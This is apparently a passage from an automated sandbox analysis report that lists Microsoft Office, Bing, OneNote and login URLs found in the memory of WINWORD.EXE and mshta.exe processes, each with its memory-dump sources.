Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/F7
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v11Q
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v16
Source: WINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/W
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.jsonv
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlG
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtmlP
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/Url
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/e7
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comOLj
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000001.00000003.292178195.00000000108E6000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://graph.ppe.windows.net
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://graph.ppe.windows.net/
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://graph.windows.net
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://graph.windows.net/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comGJb
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dMBI_SSL_SHORTofficeapps.live.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: WINWORD.EXE, 00000001.00000003.292178195.00000000108E6000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?I0e
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000001.00000003.292178195.00000000108E6000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppHomeR
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookdll
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickrb
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive~
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech9
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://lifecycle.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
Source: mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://login.microsoftonline.com/
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizew
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://login.windows.local
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: WINWORD.EXE, 00000001.00000002.571191483.0000000010861000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417530932.0000000010865000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/au
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#~
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
